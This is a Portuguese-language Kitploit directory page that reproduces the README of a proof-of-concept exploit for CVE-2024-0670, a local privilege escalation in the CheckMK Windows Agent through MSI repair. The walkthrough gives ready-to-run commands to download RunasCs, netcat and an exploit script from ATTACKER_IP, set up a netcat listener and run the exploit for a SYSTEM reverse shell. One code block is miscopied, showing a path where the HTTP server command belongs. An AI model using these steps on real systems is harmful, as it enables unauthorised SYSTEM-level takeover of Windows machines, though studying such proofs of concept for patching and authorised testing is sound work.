Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/elsevar11/cve-2024-0670-checkmk-agent-local-privilege-escalation-exploit
Escalada de PrivilégiosGeração de PayloadsAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoAprendizado e EducaçãoExploração de Binários
GitHubelsevar11/cve-2024-0670-checkmk-agent-local-privilege-escalation-exploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →

Sobre

Este repositório contém uma demonstração de exploração para CVE-2024-0670, uma vulnerabilidade de escalação de privilégios local que afeta o CheckMK Agent para Windows. A vulnerabilidade permite que um usuário com baixos privilégios obtenha privilégios de SYSTEM ao abusar de caminhos de arquivo graváveis processados pelo mecanismo de reparo do MSI.

CVE-2024-0670-CheckMK-Agent-Local-Privilege-Escalation-Exploit

Ver Repositório
31há 9 mesesAinda não revisado
Compartilhar

CVE-2024-0670 – Escalação de Privilégio Local no CheckMK Agent (PoC)

Este repositório contém uma prova de conceito simples e limpa para CVE-2024-0670, uma vulnerabilidade de escalação de privilégio local no CheckMK Windows Agent. Um usuário com privilégios baixos pode obter privilégios de SYSTEM abusando de caminhos de arquivos temporários graváveis executados durante a reparação do MSI.

🔍 Resumo da Vulnerabilidade

  • Fornecedor: Tribe29
  • CVE: CVE-2024-0670
  • Advisory: https://sec-consult.com/vulnerability-lab/advisory/local-privilege-escalation-via-writable-files-in-checkmk-agent/

Durante uma reparação do MSI, o CheckMK executa arquivos em:

root@kitploit:~
  C:\Windows\Temp\

Se um usuário normal puder colocar arquivos lá com nomes previsíveis, ele pode executar comandos como NT AUTHORITY\SYSTEM.

Este exploit semeia vários nomes de arquivos payload e aciona a reparação do MSI para obter execução como SYSTEM.

📂 Arquivos

root@kitploit:~
RunasCs.exe     → runas replacement (plaintext password support)
nc.exe          → Netcat (reverse shell)
exploit.ps1     → CVE-2024-0670 exploit script
README.md       → documentation

🛠 Requisitos

  • Usuário Windows com privilégios baixos
  • PowerShell habilitado
  • CheckMK Windows Agent instalado
  • Capacidade de baixar arquivos
  • Python (para servidor HTTP simples)
  • Listener Netcat na máquina atacante

📡 Iniciar Servidor HTTP

root@kitploit:~
  C:\Windows\Temp\

📥 Baixar Ferramentas no Alvo

root@kitploit:~
Invoke-WebRequest -Uri "http://ATTACKER_IP:8000/RunasCs.exe" -OutFile "C:\Windows\Temp\RunasCs.exe"
Invoke-WebRequest -Uri "http://ATTACKER_IP:8000/nc.exe" -OutFile "C:\Windows\Temp\nc.exe"
Invoke-WebRequest -Uri "http://ATTACKER_IP:8000/exploit.ps1" -OutFile "C:\Windows\Temp\exploit.ps1

🚀 Executando o Exploit

Inicie um listener na sua máquina:

root@kitploit:~
nc -lvnp 1111
root@kitploit:~
.\RunasCs.exe username "password" "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Windows\Temp\exploit.ps1"

Se bem-sucedido, você receberá um shell reverso como SYSTEM.

🔧 Construir RunasCs Manualmente (Opcional)

root@kitploit:~
net4: 
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe -target:exe -optimize -out:RunasCs.exe RunasCs.cs 

net2: 
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe -target:exe -optimize -out:RunasCs_net2.exe RunasCs.cs

⚖️ Aviso Legal

Este projeto é apenas para testes de penetração educacionais e autorizados. Não o utilize para fins ilegais. O autor não é responsável pelo uso indevido.

Baixar ferramenta